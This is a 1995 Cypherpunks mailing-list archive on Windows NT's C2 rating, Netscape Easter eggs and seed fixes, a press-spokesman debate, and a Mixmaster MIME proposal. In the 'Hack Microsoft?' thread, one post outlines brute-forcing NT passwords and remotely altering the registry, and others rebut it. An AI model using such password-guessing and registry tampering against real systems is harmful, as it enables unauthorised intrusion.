Oh, and thank you for helping Detweiler start another flame war. I'm sure he's very happy (in between Thorazine doses).

Perry

From perry at piermont.com Tue Sep 26 07:19:33 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 26 Sep 95 07:19:33 PDT
Subject: Fax Number List
In-Reply-To:
Message-ID: <199509261418.KAA16344@frankenstein.piermont.com>

There are not going to be any "cypherpunks press releases" so there is no need for this.

"K. M. Ellis" writes:
>
> I promised last week that I would send this out when the idea of a
> blanket-fax-campaign for a c-punks press release was being discussed.

From rfb at lehman.com Tue Sep 26 07:23:57 1995
From: rfb at lehman.com (Rick Busdiecker)
Date: Tue, 26 Sep 95 07:23:57 PDT
Subject: Easter Eggs
In-Reply-To: <199509260259.WAA20138@book.hks.net>
Message-ID: <9509261421.AA00130@cfdevx1.lehman.com>

-----BEGIN PGP SIGNED MESSAGE-----

    Date: Mon, 25 Sep 1995 22:59:11 -0400
    From: Lucky Green
    Subject: Re: Netscape "random" number seed generator code available

    In article <199509251159.EAA08528 at mycroft.rand.org>, jim at acm.org (Jim Gillogly) wrote:
    >I'm nervous enough about all the Easter Eggs that have been reported in
    >Netscape, like the secret keystroke shortcut to get to Fishcam, or the
    >different behavior it exhibits when it finds a certain obscurely-named
    >directory at the top level.

    Would you please elaborate?

Personally, I like the Easter Eggs in Netscape and other software products.
I don't know if there's a consensus definition of `Easter Egg', but my working definition is something like ``An unpublicized, unharmful, preferably amusing, feature for which interested users may hunt.'' I think that such things add some fun for curious users and indicate a bit of `hacker spirit' in the development team -- meaning `hacker' in the classic sense, not the media-bastardized synonym of `cracker'. I also think that in Netscape their existence is an indication that the management at Netscape is a bit less uptight than management at some other places.

I didn't know about the FishCam Easter Egg, but I know that Netscape has a couple of Easter Eggs related to the activity indicator in the top right of the display. Typically this is the Big N logo with animated meteors, etc. flying by when the window is active. One Easter Egg temporarily turns this into a compass which spins to indicate activity. Another causes the animation to show a dragon (Mozilla) breathing fire for the remainder of the session. I won't spoil your fun by telling how to find them.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGgMNJNR+/jb2ZlNAQEnnQP/TAYOTJtoWX8Pn0cXrKNSlpTCFnyWxC+3
U1E5xUxWMXsbEet3ENu35NtR03ZeyZCVr5viKTTmLptwFf/Qac4isTU78G3YOFTe
A3dX2KZfshxDtrk+n3Rx+NQtUSA+qRn/r0mPYLlFrsMCIXi/sUVhQKY1BH1eRXUK
tghPqDV0exE=
=jgb5
-----END PGP SIGNATURE-----
--
Rick Busdiecker				Please do not send electronic junk mail!
net: rfb at lehman.com or rfb at cmu.edu	PGP Public Key: 0xDBD9994D
www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
send mail, subject "send index" for mailbot info, "send pgp key" gets my key

From todd at lgt.com Tue Sep 26 07:28:55 1995
From: todd at lgt.com (Todd Glassey)
Date: Tue, 26 Sep 95 07:28:55 PDT
Subject: Hack Microsoft?
Message-ID:

Ray scribes:
> Microsoft recently got C2-security status approved for Windows NT by
>the National Computer Security Center, a division of the NSA.
They >are supposed to put systems through "laborious testing and review" before >they approve C2. Not so laborious, the brunt of C1 and C2 testing is accomplished by a test suites that do topical levels only. The issue is that there is a NCSC engineer watching it happen. Hence if oit passes it is "blessed". As per the orange book itself, C2 is about the lowest level of "Secure" that you can get. In fact if Microsoft had gone to the trouble of a B1 or B2 rating this would have been impressive but since most systems analysts have not been familiarized with the levels of system accounting and access control/logging that represents the various levels of "Orange Book" Rating it is somewhat superfluous. >So, if one can find bugs in NT's security, one can >toss a little more egg on the NSA's face and the sham that part of >their activies to *help* to secure american computers. A simple >violation of NT's C2 status would be to demostrate a flaw in it's >memory protection implementation. >Personally, I think NT is >*riddled* with bugs waiting to be discovered. Hell, even the >NT "service pack" is included in the C2 status, which I bet >has plenty of holes. No Doubt; NT should be easily hacked in the upcomming months by any number of mortals let alone the gods themselves. What UNIX has that NT doesn't (which makes it more vuknerable to attack) is 20 more years of evolution, More copies, everybody knows it (at least in our group)... As per NT's orange book C2 Rating... C2 is about the lowest level of Secure that you can get. In fact I personally am unimpressed, rather it is a box on an RFQ that gets checked Very few people run C anything sites in reality. If Microsoft had gone to the trouble of a B1 or B2 rating this would have been cool but since most system's analysts have not been familiarized with the levels of system accounting and access control/logging that represents the various levels of "Orange Book" Rating it is somewhat superfluous. 
This is especially true since the Folks at the FRB and FDIC/FSLIC orgaizations are more likely to require B2 or the like on the National Standards for "blessed" commerce Engines (I wonder what the FSTC has to say about this?). Seems to me like the "Evil Empire" is just puffing it's chest for a very very small market... IMHO - Military sites passing real classified data usually are not run on anything as low as C2. If you want a secure os, look at the Harris Computer Corp's B1-Certified version of ES/MP UNIX (they call it CX/SX). FOUO - For Official Use Only sites often run C1/C2 based OS's for Audit training but are usually not part of the Trusted Computing Base and as such not real threats. Still the most common problem is human not the OS. Not the actual OS itself,. > > If Cypherpunks can find flaws that the NSA can't, or won't divulge, >what does that say about their so-called COMSEC ability. Not necessarily on the NSA, you have to start somewhere and they do a good job as far as NIST and NCSC efforts are concerned. If you can do better then you have a good career in commercial cracking or will have lots of time on your hands (Federal Food is the Pits, and the golf course is gone from Lompoc!). > >-Ray > > > > Regards, T. S. Glassey Chief Technologist Looking Glass Technologies todd at lgt.com -----BEGIN PGP SIGNATURE----- Version: 2.6 iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0 0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y =bTYb -----END PGP SIGNATURE----- From dan at milliways.org Tue Sep 26 07:33:22 1995 From: dan at milliways.org (Dan Bailey) Date: Tue, 26 Sep 95 07:33:22 PDT Subject: Hack Microsoft? Message-ID: <199509261433.AA11352@ibm.net> On Tue, 26 Sep 1995 00:04:08 -0400 (EDT) you wrote: > > > Microsoft recently got C2-security status approved for Windows NT by >the National Computer Security Center, a division of the NSA. 
They >are supposed to put systems through "laborious testing and review" before > If Cypherpunks can find flaws that the NSA can't, or won't divulge, >what does that say about their so-called COMSEC ability. > For fun ways to hack NT, check out http://www.somar.com/security.html. Some of these are really laughable. You can use NT's LogonUser API call to repeatedly guess passwords until you hit it, since NT offers no way to limit number of login attempts. There also is no way to stop remote users from modifying the registry. *Any* user with an account can remotely dump and modify the system registry. So in theory you can write a bruteforce program to keep guessing until it gets a password, then modify the registry to make the system to "interesting" things. The worst part of all this is that the Registry is very poorly documented, MSoft must consider most of that info "confidential." Fortunately, when using NT's SMB services such as drive and file sharing, passwords are never sent in the clear. Just make sure you disable that "Guest" account.:) Dan Bailey *************************************************************** #define private public dan at milliways.org Worcester Polytechnic Institute and The Restaurant at the End of the Universe *************************************************************** From tfs at vampire.science.gmu.edu Tue Sep 26 07:45:11 1995 From: tfs at vampire.science.gmu.edu (Tim Scanlon) Date: Tue, 26 Sep 95 07:45:11 PDT Subject: Hack Microsoft? In-Reply-To: <199509260404.AAA14297@clark.net> Message-ID: <9509261444.AA10518@vampire.science.gmu.edu> It should be possible to FOIA the evaluation that led to the C2 status on this. That would be one good avenue to start looking at it. At the end of the process there should be a document that shows how the OS meets each of the C2 requirments and what aspects of the software were considered as well. Things like the state the OS was running under at the time, (network vs. non-network etc.) 
are important considerations in evaluations. And I would not be too surprised at all if the "C2" designation was relativly bogus. This sort of thing can get much like the anti-crypto crowds arguments. Highly political with little basis in rationality. Since I've seen stuff like a ported version of Unix's "ps" utility, and know NT runs a microkernel, I can think of a hell of allot of ways it'd be possible to fail it right out of the box... Considering that it has the cpacity to do all sorts of network stuff, including FTP & the like, I wonder how the hell they passed any audit requirements. Probably a "Well it runs in a single user model, we don't need to have strong audit requirments". My point basicly being that I would consider the C2 designation for this to be broken coming out of the box unless I saw proof that it was otherwise. To operate it in a C2 required environment without consideration of how & under what conditions the rating was achived would be criminaly irresponsible. Tim Scanlon ________________________________________________________________ tfs at vampire.science.gmu.edu (NeXTmail, MIME) Tim Scanlon George Mason University (PGP key avail.) Public Affairs I speak for myself, but often claim demonic possession From cactus at hks.net Tue Sep 26 08:00:50 1995 From: cactus at hks.net (Leslie Todd Masco) Date: Tue, 26 Sep 95 08:00:50 PDT Subject: Archives current again Message-ID: <199509261458.KAA22013@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- I've just updated the archives (http://www.hks.net/cpunks/index.html). To bring everybody up to date on what's happening: Hypermail simply isn't up to this size of an archive. All sorts of bugs are coming out into the open, so I've been implementing a system designed for large archives. Alas, reality has intruded and I haven't had the time to finish it. So, I'll be updating the archives by hand from time to time until I can get the new system on line. Sorry 'bout that, folks, but you get what you pay for. 
- --
Todd Masco      | "life without caution/ the only worth living / love for a man/
cactus at hks.net  | love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service. A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGgVHCoZzwIn1bdtAQE0gwF/dQiO+4lTabDqAt0SgyHmEJSKXgCABGa6
kEOsJIgd/4uIUzrunV+fXBucevMsW4yG
=BngF
-----END PGP SIGNATURE-----

From tfs at vampire.science.gmu.edu Tue Sep 26 08:09:51 1995
From: tfs at vampire.science.gmu.edu (Tim Scanlon)
Date: Tue, 26 Sep 95 08:09:51 PDT
Subject: Insecurity in WWW oriented security
Message-ID: <9509261509.AA10554@vampire.science.gmu.edu>

I wanted to share an experience with folks on the list that points to the relevance of what c'punks have been doing looking at the Web encryption & security issues like we have.

I was approached by a headhunter yesterday who wanted me to do the security for a hospital connected to the net. Straightforward stuff, one would think. My initial reaction was fairly positive, and I responded that I didn't think I would have much trouble with the task as long as they had a reasonable setup internally etc. etc. (I'm not a big believer in hard & crunchy -> soft & chewy when your accounting or other critical data is part of what can be chewed up...)

Well, at that point it got interesting. He told me that said client was asking as a part of their requirements that they be able to do "Secure transactions using HTML & Netscape". My reaction was somewhere along the lines of "What do they mean by `secure transactions'!! Are they aware that the state of encryption for WWW is really poor at best right now?"

I told him that I thought this might not be such a hot idea, and that my interest in this whole thing would hinge totally upon exactly what sorts of transactions they wanted to do using web servers and the like. And that depending on the answer to that, I would or would not be interested in the whole thing.

The reason for my hesitation? I don't want blood on my hands over a setup that is by definition currently in a state of very poor security. And right now I have no idea if they want to transfer MasterCards or MRIs. But I do know that depending on what it is they're planning, it might not be a place *I* want to be.

Besides being damned frightening, this points to a trend in network evolution. Organizations are planning these sorts of moves and utilizations of the technology with little thought to the possible consequences of it. And if the FBI ends up busting some psycho in the future for tampering with the transactions of MRI data, x-rays, or any of a million other possibilities, I seriously doubt that Louis Freeh will be stepping forward to remind us all of the need for robust security. Instead, it is far more likely that he would argue that it was another example of the need for increased monitoring of the internet and controls on cryptographic solutions.

I found aspects of the whole conversation, juxtaposed with what has been going on lately with the list, chilling to say the least.

Tim Scanlon
________________________________________________________________
tfs at vampire.science.gmu.edu (NeXTmail, MIME)         Tim Scanlon
George Mason University      (PGP key avail.)        Public Affairs
I speak for myself, but often claim demonic possession

From tcmay at got.net Tue Sep 26 08:59:33 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 26 Sep 95 08:59:33 PDT
Subject: Cypherpunks Press release
Message-ID:

I guess you all know how much I hate this "who will be our spokesman?" thread, but my opinion has been explicitly asked, so I will again comment. Hopefully, adding a few new points.

At 6:55 AM 9/26/95, Craig Hubley wrote:
>Damn fine idea, but how do a bunch of (p)anarchists choose a mouthpiece ?
>Should we assign someone to be 'our' lawyer ?
>
>I'd volunteer to be 'spokespunk', I've certainly been interviewed for TV and
>print enough, and know how to handle and present myself to the press, but if
>this is considered an 'honor' rather than a 'pain in the ass and potential
>legal lightning rod' then I'd like to suggest someone with a longer pedigree
>who has been writing more code lately take it on. Tim ?

I've turned down several recent chances for interviews, for these reasons:

1. I feel the people doing the work should be interviewed, not just someone who has some visibility (whatever mine might be). If PGP is the issue, then they should talk to those working on PGP. If anonymous remailers are the issue, etc. If, by some chance, they are interested in things I have directly worked on or written extensively about, then maybe they should interview me. (Although for other reasons I refused to have my name attached to the cover story in "Information Week" about "Internet Theft," BlackNet, etc.)

2. Location, location, location! The media foci are Washington, New York, and San Francisco, at least for our area of interest. Occasional forays into Austin, Miami, L.A., etc. This is where the taped interviews are done. Several "crews" recently in SF wanted "sound bites" and "video bites" from people like me. I refused, pointing out the wastefulness of my time in driving 100 miles over mountain roads to SF, fighting parking problems, waiting around, and ending up with a 7.89 second clip of me saying something scripted.

(In February I stupidly agreed to travel to LA for a filming of a BBC show about encryption. Left at dawn, drove to San Jose, flew to LA, took shuttle to Hollywood, waited around for several hours while crew finished taping Alvin and Heidi Toffler, set up my laptop, was interviewed by show's producer, agreed at her repeated prodding to say "I am a Cypherpunk." Got back to my house at midnight. Guess what they used? The stupid line "I am a Cypherpunk" and maybe about 20 seconds of other random comments. This is what we face, as other high tech shows I see have the same disjointed, out-of-context flavor.)

The point? These "journalists" are tuned to looking for catchy quotes, all the more so on video than in print. Text journalists can handle complex themes much better than video reporters can, for many and oft-discussed reasons.

(Even more disgusting than this was a more recent appearance of a BBC film crew at a Cypherpunks meeting. They wanted to "stage" the news, to have the meeting discuss a 2-year-old topic, because that's what their script called for. I got up and left, as did several other people. I haven't seen this BBC show, but I gather from a URL that this is the one that has "performance art" examples of crypto....)

Any "spokesman" needs to be easily accessible when they need a "filler quote," or a "reaction quote." However:

3. THERE IS NO SPOKESMAN, THERE IS NO CENTRAL OFFICE, THERE IS NO BOARD OF DIRECTORS! With no organization, no office, no coordination, we cannot "feed the media machine" the way it expects to be fed. Nor can we "elect" such folks. I didn't help start this list--not that this gives me more moral sway--in order that J. Random Volunteer will start speaking for "our beliefs" or will start explaining "our goals" and "our plans."

Far better that journalists like Steven Levy and John Markoff subscribe to the list, or to condensations by people like Eric Blossom, and then deal directly with the experts in some area. Thus, on the latest Netscape flaw, they would contact Ray Cromwell directly, not deal with the press releases written by J. Random Volunteer.

Anarchy is part of our charm. More importantly, part of our theme. Face it, we don't have a press office, we don't have staffing, and--most importantly--there is no one out there who speaks for me.

A spokesman for the Cypherpunks is an oxymoron.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152  | anonymous networks, digital pseudonyms, zero
Corralitos, CA               | knowledge, reputations, information markets,
Higher Power: 2^756839       | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From harveyrj at vt.edu Tue Sep 26 09:10:56 1995
From: harveyrj at vt.edu (RJ Harvey)
Date: Tue, 26 Sep 95 09:10:56 PDT
Subject: Hack Microsoft?
Message-ID: <9509261610.AA13583@toad.com>

At 10:33 AM 9/26/95 EDT, Dan Bailey wrote:
>On Tue, 26 Sep 1995 00:04:08 -0400 (EDT) you wrote:
>
>>
>>
>> Microsoft recently got C2-security status approved for Windows NT by
>>the National Computer Security Center, a division of the NSA. They
>>are supposed to put systems through "laborious testing and review" before
>> If Cypherpunks can find flaws that the NSA can't, or won't divulge,
>>what does that say about their so-called COMSEC ability.
>>
>For fun ways to hack NT, check out http://www.somar.com/security.html.
> Some of these are really laughable. You can use NT's LogonUser API
>call to repeatedly guess passwords until you hit it, since NT offers
>no way to limit number of login attempts.

I don't believe that's correct; under User Manager, select the Account option under the Policies menu item; it lets you select whether to lock out the account after a given number of invalid logon attempts, and to set the number. The main problem here is that by default, I don't believe the 'lock out' option is enabled (and thus, brute-force attempts at Guest or a similar account might indeed work).

rj
---------------------------------------------------------
R. J. Harvey                      email: harveyrj at vt.edu
WWW for job analysis/personality: http://harvey.psyc.vt.edu/
PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt

From mmarkley at microsoft.com Tue Sep 26 09:11:19 1995
From: mmarkley at microsoft.com (Mike Markley)
Date: Tue, 26 Sep 95 09:11:19 PDT
Subject: Hack Microsoft?
Message-ID: <9509261711.AA01641@netmail2.microsoft.com>

Dan Bailey writes:
| There also is no way to stop remote users from modifying the
| registry. *Any* user with an account can remotely dump and modify the
| system registry. So in theory you can write a brute-force program to
| keep guessing until it gets a password, then modify the registry to
| make the system do "interesting" things. The worst part of all this
| is that the Registry is very poorly documented, MSoft must consider
| most of that info "confidential."
| Fortunately, when using NT's SMB services such as drive and file
| sharing, passwords are never sent in the clear. Just make sure you
| disable that "Guest" account. :)

This is not entirely true. If I log in as 'guest' I cannot modify just any key in the registry. I can only modify the ones that I have permissions to change. Also, if you know what you are doing you can set permissions on any key in the registry so that it can't be modified by just anyone. I can also modify the account permissions so that if a logon attempt fails, after a specified number of retries the account is locked and will not accept logons until the administrator unlocks the account.

I'd recommend that you get a copy of Windows NT and the Windows NT Resource Kit, install it and play around with the security system before you make generalized statements about it.

Mike.
=====================================================
Mike Markley
I'm not a Microsoft spokesperson.
All opinions expressed here are mine.
=====================================================

From tomw at orac.engr.sgi.com Tue Sep 26 09:24:33 1995
From: tomw at orac.engr.sgi.com (Tom Weinstein)
Date: Tue, 26 Sep 95 09:24:33 PDT
Subject: More on "Entropy"
Message-ID: <199509261622.JAA02167@orac.engr.sgi.com>

In article , David Van Wie writes:
> David Van Wie wrote:
>>> The entropy E is defined by the sum across n states of -P_i log_2(P_i),
> Timothy C. May wrote:
>> Hah! Another physicist converted to the information-theoretic view of
>> entropy!
> Indeed. I was able to track down the literature, and it is most
> interesting. I am still a little bit skeptical of the "superset including
> thermodynamic entropy" school of thought, but I haven't finished reading all
> of the materials yet! Clearly, the IT "version" of entropy is a well
> defined and useful thing....

We used this formulation of entropy in Statistical Mechanics. It's especially useful in Quantum Thermo where you can actually enumerate all of the states instead of relying on probabilistic arguments.

--
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  -- Washington DC motto            | tomw at engr.sgi.com

From mkj at october.ducktown.org Tue Sep 26 09:44:50 1995
From: mkj at october.ducktown.org (mkj at october.ducktown.org)
Date: Tue, 26 Sep 95 09:44:50 PDT
Subject: Golden Coy Freeh
Message-ID: <199509261605.AA00814@october.ducktown.org>

A non-text attachment was scrubbed...
Name: not available
Type: application/pgp
Size: 14 bytes
Desc: not available
URL:

From mkj at october.ducktown.org Tue Sep 26 09:44:55 1995
From: mkj at october.ducktown.org (mkj at october.ducktown.org)
Date: Tue, 26 Sep 95 09:44:55 PDT
Subject: cypherpunks press releases/contact list
Message-ID: <199509261623.AA00939@october.ducktown.org>

A non-text attachment was scrubbed...
Name: not available
Type: application/pgp
Size: 14 bytes
Desc: not available
URL:

From tcmay at got.net Tue Sep 26 09:53:02 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 26 Sep 95 09:53:02 PDT
Subject: "Notes" to be Eclipsed by "Netscape"
Message-ID:

At 6:52 PM 9/25/95, Jon Lasser wrote:
>Perhaps the Notes pricing scheme is sooo outrageous (by the standards of
>a student like myself, and probably most others, if it's still anything
>like it was at the 1.0 release) that most people have had zero opportunity
>to examine the program, let alone really have time to play with it?

I've never even _seen_ a copy of Notes running on any machine, nor do I know directly of _any_ of my colleagues who has. (Not saying nobody has, of course, just that I can't find anyone I know well who has.)

I've been following the news on Notes for at least several years, even to the point of buying some Lotus stock several years ago on the strength of what I had read about Notes. (Alas, I sold it soon thereafter, before a run-up in price.)

My point? Notes is nearly invisible in the non-corporate community I now hang out in. Who knows what weaknesses or bugs it has in it. Folks on our list probably don't have much familiarity with it.

My hunch is that, as the "Wall Street Journal" reported yesterday, that IBM overpaid for Lotus, that the notion of Notes becoming the universal collaboration/communication option is flawed. (I've been saying for a while that the Web serves that purpose better, and that Web browsers will likely edge out Notes. Apparently I was hardly prescient, as Netscape recently bought Collabra, which is pushing that point exactly.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May               | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152  | anonymous networks, digital pseudonyms, zero
Corralitos, CA               | knowledge, reputations, information markets,
Higher Power: 2^756839       | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From rah at shipwright.com Tue Sep 26 10:09:52 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 26 Sep 95 10:09:52 PDT
Subject: SpokesPunking...
Message-ID:

At 3:03 AM 9/26/95, Craig Hubley wrote:
>"Consensus on cypherpunks seems to be that 40 bit encryption is not viable
> for commercial applications, and that Netscape seems to have taken less
> than due care to choose an appropriate random seed for its session keys."

No offense offered Craig, 'cause I like reading your stuff here, but the consensus opinion on cypherpunks is "We don' need no steeenking spokespunk!". It seems to me that you can say that without any title, and the mouthier amongst us will be tapped for quotes as individuals anyway...

Cheers,
Bob Hettinga
-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA
(617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<

From nelson at santafe.edu Tue Sep 26 10:33:53 1995
From: nelson at santafe.edu (Nelson Minar)
Date: Tue, 26 Sep 95 10:33:53 PDT
Subject: Security Update news release
In-Reply-To: <199509260306.XAA20157@book.hks.net>
Message-ID: <9509261732.AA08810@sfi.santafe.edu>

>Do the new versions use PGP's randseed.bin? If Netscape even only looks at
>data used to keep PGP secure, Netscape will be banned from my computer
>and every computer I am responsible for. -- For good.

This is the second person who has expressed this sentiment. I don't understand it. If you believe that the possibility of randseed.bin getting out is dangerous, then why do you leave it online? Do you really trust every piece of software you run, every piece of software that can possibly access your machine over the net, to not look at that file?

From patrick at Verity.COM Tue Sep 26 10:37:13 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Tue, 26 Sep 95 10:37:13 PDT
Subject: Security Update news release
Message-ID: <9509261733.AA22080@cantina.verity.com>

> >
> > Here is the press release we put out this morning regarding the fix
> >for RNG seed and stack overflow problems.
>
> Do the new versions use PGP's randseed.bin? If Netscape even only looks at
> data used to keep PGP secure, Netscape will be banned from my computer
> and every computer I am responsible for. -- For good.

That doesn't quite make sense. Netscape reading randseed.bin can have no effect on the security of PGP.

Patrick

_______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;).  \
| (\                                                                   |
| Patrick J. Horgan        Verity Inc.                  \\    Have     |
| patrick at verity.com      1550 Plymouth Street          \\ _ Sword    |
| Phone : (415)960-7600    Mountain View                  \\/  Will    |
| FAX   : (415)960-7750    California 94303              _/\\  Travel  |
\___________________________________________________________\)__________/

From jim at acm.org Tue Sep 26 10:41:41 1995
From: jim at acm.org (Jim Gillogly)
Date: Tue, 26 Sep 95 10:41:41 PDT
Subject: Easter Eggs
In-Reply-To: <9509261421.AA00130@cfdevx1.lehman.com>
Message-ID: <199509261614.JAA15814@mycroft.rand.org>

> In article <199509251159.EAA08528 at mycroft.rand.org>, jim at acm.org (Jim
> Gillogly) wrote:
> >I'm nervous enough about all the Easter Eggs that have been reported in
> >Netscape, like the secret keystroke shortcut to get to Fishcam, or the
> >different behavior it exhibits when it finds a certain obscurely-named
> >directory at the top level.
>
Rick Busdiecker writes:
> Personally, I like the Easter Eggs in Netscape and other software
> products. I don't know if there's a consensus definition of `Easter
> Egg', but my working definition is something like ``An unpublicized,
> unharmful, preferably amusing, feature for which interested users may
> hunt.'' I think that such things add some fun for curious users and

I enjoy Easter Eggs in general, and I agree that a program with fun stuff like this in it gives one a warm fuzzy feeling about the relaxed management style at the company that produces it.

On the other hand, of all kinds of mass market software, network-aware software needs to have the most trust from the users, because it alone has the capability of passing information out of your machine. My preference is always to have source code available for security-critical functions so that I can verify that it's not only doing what I want, but also doing nothing that I don't want. For a program like Netscape it doesn't make sense to supply source code, of course, and the Easter Eggs already provide some evidence that it's doing something that I didn't "buy" (assuming I've bought it, of course). From there it's a short step to the questions "What else is it doing that I didn't pay for? Reading my PGP key generation environment? Interesting. What else?"

> I didn't know about the FishCam Easter Egg, but I know that Netscape

Ctrl-alt-f if you're a PC type, or Ctrl-meta-f if you're on a Sun; I'm calling the diamond to the left of the space bar a "meta".

Jim Gillogly
Hevensday, 5 Winterfilth S.R. 1995, 16:14

From futplex at pseudonym.com Tue Sep 26 11:06:56 1995
From: futplex at pseudonym.com (Futplex)
Date: Tue, 26 Sep 95 11:06:56 PDT
Subject: getting netscape to support the remailers
In-Reply-To: <199509260239.TAA14898@infinity.c2.org>
Message-ID: <9509261805.AA22239@cs.umass.edu>

sameer writes:
> I think that in order to get netscape to support the remailers
> the remailers will have to:
>
> A) Support S/MIME
> B) Have a documented protocol, MIME-related
>
> Did Ray Cromwell do some work towards MIMEifying the
> remailers? My impression of his work back when he posted was that it
> trusted the remailers too much, but perhaps my memory is flawed-- in
> any case his work may be helpful towards developing a remailer
> standard, which could then help get support incorporated into
> MIME agents.

Here's something I sent to the list on July 24 which may be of interest:

---- begin included message ----

Perry Metzger writes:
>>> It would be very, very good if everyone doing secure mail systems of
>>> one sort or another (including PGP integrated mail packages and
>>> remailers) slowly moved forward to the formats described in this
>>> document, which is now a proposed internet standard...

The IESG writes:
> The IESG has approved the following two Internet-Drafts as Proposed
> Standards:
>
> 1. MIME Object Security Services
> 2. Security Multiparts for MIME: Multipart/Signed and
>    Multipart/Encrypted
>
> These documents are the product of the Privacy-Enhanced Electronic Mail
> Working Group. The IESG contact person is Jeffrey Schiller.
>
> Technical Summary
>
> These documents describe a general framework for security within MIME
> (draft-ietf-pem-sigenc-03.txt) and a specific proposal for offering
> Privacy Enhanced Mail services within MIME (draft-ietf-pem-mime-08.txt).
> Support is provided for digital signatures on MIME objects (both simple
> and compound) as well as for confidentiality provided through data
> encryption.
I've spent some time reading these proposed standards, along with parts of RFCs 1423 and 1590, with an eye to applying them to remailers. I'd like to get a sanity check and comments before I consider proceeding with submission to the IETF Media Types review list, etc. I propose a new Media Type subtype for Mixmaster remailer packets, "application/mixmaster". (For the purposes of this message, "Mixmaster remailer packet" refers to a packet generated by a Mixmaster server or client, and intended for transmission to a Mixmaster server. It does *not* cover messages generated by a Mixmaster server that are intended for an ultimate message recipient.) This is intended to be an experimental protocol for use in the control part of a multipart/encrypted message. There is one required parameter, "version", meant to indicate the version number of the originating Mixmaster software. In addition, one optional parameter, "key-id", may be included. If present, this parameter would indicate the single line key prefix/ID of the public Mix key used to encrypt (at the outermost layer) the contents of the application/mixmaster part. This might be used to thoroughly disambiguate decryption options in the event that the recipient server has more than one currently active public Mix keys. The application/mixmaster (control) part of the multipart/encrypted message would contain the padded list of Mixmaster server hop headers, superencrypted at the outermost layer with a public Mix key (presumably, one belonging to the recipient server). A single decryption of these headers should reveal the IDEA key used to superencrypt, at the outermost layer, the body part of the multipart/encrypted message. The application/octet-stream (body) part of the multipart/encrypted message would contain the list of ultimate recipients of the remailed message, the text of the message itself, and any additional processing instructions to the final Mix server. 
The latter, body part of the multipart/encrypted message shall have been encrypted by the originator using the IDEA key specified in the former, control part. The contents of the application/mixmaster part should be encoded in accordance with the standards for application/octet-stream. (NB: this amounts to a division of the extant Mixmaster packet format roughly into a control section and a body ("payload") section.)

Comments ?

-Futplex

---- end included message ----

-Futplex

From stewarts at ix.netcom.com Tue Sep 26 11:58:55 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 26 Sep 95 11:58:55 PDT
Subject: Hack Microsoft NT C2 Rating?
Message-ID: <199509261856.LAA24022@ix6.ix.netcom.com>

At 07:27 AM 9/26/95 -0700, todd at lgt.com (Todd Glassey) replied to Ray:
>>So, if one can find bugs in NT's security, one can
>>toss a little more egg on the NSA's face and the sham that part of
>>their activities to *help* to secure American computers. A simple
>>violation of NT's C2 status would be to demonstrate a flaw in its
>>memory protection implementation.

One of the bigger cracks on VMS was after it got its C2 rating; a strong system doesn't do you much good if you don't change the default passwords for the SYSTEM and FIELD service accounts :-) I'm more surprised by the rating since the Orange Book is basically for non-networked systems; Red Book rating is _much_ harder, unless the NSA's taking a different view of trustability of software encryption for authentication purposes than they used to.

>As per NT's orange book C2 Rating... C2 is about the lowest level of Secure
>that you can get. In fact I personally am unimpressed, rather it is a box
>on an RFQ that gets checked. Very few people run C anything sites in reality.

A C2 rating says that most of the obvious bugs have been found, access to the system and individual files requires authentication, and you can do an audit trail to find out who accessed what data when. Ignoring networks, that's not too bad.
But, yeah, one of the big reasons for C2 rating is that government RFPs generally require C2 security, at least for military or sensitive non-military purchases. B-level ratings give you multi-level security, so you can run SECRET and CONFIDENTIAL on the same box; it's not a very useful security model for non-military applications, but does let you do a better-trusted job of system integrity.

>IMHO - Military sites passing real classified data usually are not run on
>anything as low as C2. If you want a secure os, look at the Harris Computer
>Corp's B1-Certified version of ES/MP UNIX (they call it CX/SX).

Hah. Maybe it's changed since I was working with the AT&T System V/MLS folks, but the vast majority of classified processing back then was done on unrated or C2 systems running System High - everybody's cleared, and the boxes with the classified stuff aren't connected to the outside except by limited sneakernet. You can get a _lot_ of security by keeping your computers in locked rooms, and the average PC of those days could fit in a big safe at night even if it couldn't fit in a locked file cabinet. (And floppy disks or external shoeboxes were easy to lock up.)

Dan B. wrote
>For fun ways to hack NT, check out http://www.somar.com/security.html.
>Some of these are really laughable. You can use NT's LogonUser API
>call to repeatedly guess passwords until you hit it, since NT offers
>no way to limit number of login attempts.

That's the kind of thing that would get changed for a C2 version, just as the Unix login program had to be souped up for C2 and B1. Even adding a constant delay, or an increasing delay after bad attempts, is a good start for systems like that. (It turns out that logging user names on bad attempts has to be done carefully to avoid increasing risk - if users get out of sync on typeahead when entering their login and password, you can end up logging passwords, which was especially bad when that sort of data got printed on the paper console...)
#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
